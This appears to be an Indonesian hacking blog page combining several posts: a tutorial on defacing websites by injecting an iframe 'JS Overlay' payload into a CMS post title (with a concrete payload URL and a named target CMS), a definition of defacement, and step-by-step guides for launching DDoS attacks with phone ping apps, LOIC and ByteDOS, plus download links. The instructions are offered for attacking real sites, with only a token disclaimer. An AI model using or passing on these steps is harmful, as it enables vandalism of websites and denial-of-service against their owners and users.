<center><FONT COLOR="red"><FONT SIZE=6><marquee>Just simple script by nabilaholic</marquee></FONT></FONT></center>
</body>
</HTML>
Untuk memebri backsound di script, caranya sama seperti memberi backsound di template blog
Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload.
Lalu bagaimana solusinya agar kita bisa men-deface web tersebut ? Dengan JS Overlay. Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?

Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa membuat web/blog sendiri, dideface sendiri hanya sebagai "umpan" dari JS Overlay.

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :

 
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.

 

Masukkan script ini di bagian judul :
<center><iframe src='[situs yang pernah dideface]' height='820px' width='1100px' scrolling='no' frameborder='0'></center>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Untuk contoh, ini script saya :
<center><iframe src='http://personal-jsoverlay.blogspot.com/' height='820px' width='1100px' scrolling='no' frameborder='0'></center>
Lalu klik save
 
Upzzz, you got HACKED !!!!

Teknik ini [sepertinya] bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.
Kekurangan dari teknik ini adalah kita hanya punya sekali akses ke web korban karena kita tidak bisa menanam backdoor.
Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya. Resiko tanggung dewe.
Beberapa hari yang lalu saya sempat share tutorial tentang deface. Namun ternyata masih ada sobat yang tidak tahu apa itu deface. Apa itu deface ? Minuman ? Makanan ? Jawabannya : bukan !!
Deface yang berdasarkan kamus UMUM berarti merusakkan; mencemarkan; menggoresi; menghapuskan
tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (bisa di folder atau di file).
Defaced !!!!
Contoh tampilan web yang ken deface
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat bug pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak umum ataupun hacker lain. Biasanya aksi deface marak dilakukan diwaktu-waktu tetentu seperti Hari Kemerdekaan Indonesia, Hari Ibu, dan hari hari besar lainnya.

Sekian artikel kali ini, semoga bermanfaat.
cara ddos dari hp menggunakan aplikasi
Ddos, apa sih ddos? Di artikel ini ane ga akan menerangkan apa itu ddos, kalau mau tau cari di blog lama ane yaitu disini dan monggo diobok-obok
sebagian hacker didunia ini kalau mau perang cyber maka tools yang dipakai sudah pasti hoic,loic,byte dos, byte attacker dan lain lain yang sudah pasti khusus pc atau komputer. Bagaimana dengan yang tidak punya komputer tapi ingin ikut perang atau setidaknya belajar?
nah, disini ane akan membeberkan tools yang digunakan untuk ddos dari hp . Ada dua jenis os yang support aplikasi ini, yaitu JAVA dan symbian.
untuk symbian: pocket pinger
untuk java:auto pinger dan mobile port scanner
disini ane akan sedikit memberikan tutorial

pocket ping
1.buka appnya. Nanti pilih jalur akses andalan ente.
2.number of ping : diubah ke 10000 atau sesuai selera ente
3.ping data size:ukuran data yang ente akan kirim per ping. (kalau 10000 number of ping,dan size misalnya 1000,maka dikali saja,10000x1000. )
4.ttl dibiarkan saja default.
5.lalu klik option>ping>masukkan target (url atau ip host ) lalu tunggu sampai selesai. Rasakan hasilnya biggrin

auto pinger dan mobile port scanner">
1.buka appnya.
2.hapus semua angka di host lalu ketikkan ip atau url target.
3.port:masukkan port. Untuk mendapatkan port yang tepat, gunakan mobile port scanner, (caranya gampang,ente pasti ngerti)
4.interval:jarak waktu antar ping, (minimal 1)
5.lalu tekan OK.
apapun tools yang ente pakai, ane peringatkan dulu, bandwith ente akan kepotong banyak. Untuk gretonger gunakan trik yang all app.
yang mau appnya monggo dicomot
pocket ping:DOWNLOAD
autopinger&port scanner:DOWNLOAD
Setelah sebelumnya saya sempat share Tutorial DDoS dengan tools HOIC, kali ini saya akan share tools yang tidak kalah keren. LOIC, Low Orbit Ion Cannon. Tools ini hampir sama dengan HOIC, dan kualitasnya juga bisa dibilang sama. Jadi terserah kalian mau pake yang HOIC atau LOIC. Atau mau pake kedua-duanya.

LOIC

Langkah - langkah :

Pada kolom URL, isi dengan url target lalu klik LOCK ON.
Begitu juga dengan IP, Port, Dan Method [Untuk mengetahui IP dan Port target, bisa discan di IP Scanner online. Cari aja di Google]
Setelah semuanya diisi, klik IMMA CHARGIN MAH LAZER.
Tunggu sampai target down. Target down jika angka di Attack Status - Failed menjadi besar/banyak.
Untuk mendownload, klik link dibawah ini :
Download LOIC
Kali ini saya akan kembali share tools DDoS
Tools ini bernama ByteDOS. Tools ini tergolong ringan sehingga kita dapat membuka puluhan tab sekaligus, Cara Penggunaan ByteDOS pun sangatlah mudah.


Inilah langkah-langkah menggunakan ByteDOS :
 

1. Pertama, buka ByteDOS
2. Pilih DoS/DDoS
3. Isi IP/Host dan Port pada DoS Attack
4. Pada kolom Attack, klik semua tombol bertuliskan 0,56Mb/sec
5. Tunggu target down
Bagi yang ingin mendownload ByteDOS, saya sudah sediakan linknya.

Wiientotv
Copyright © 2018 - All rights reserved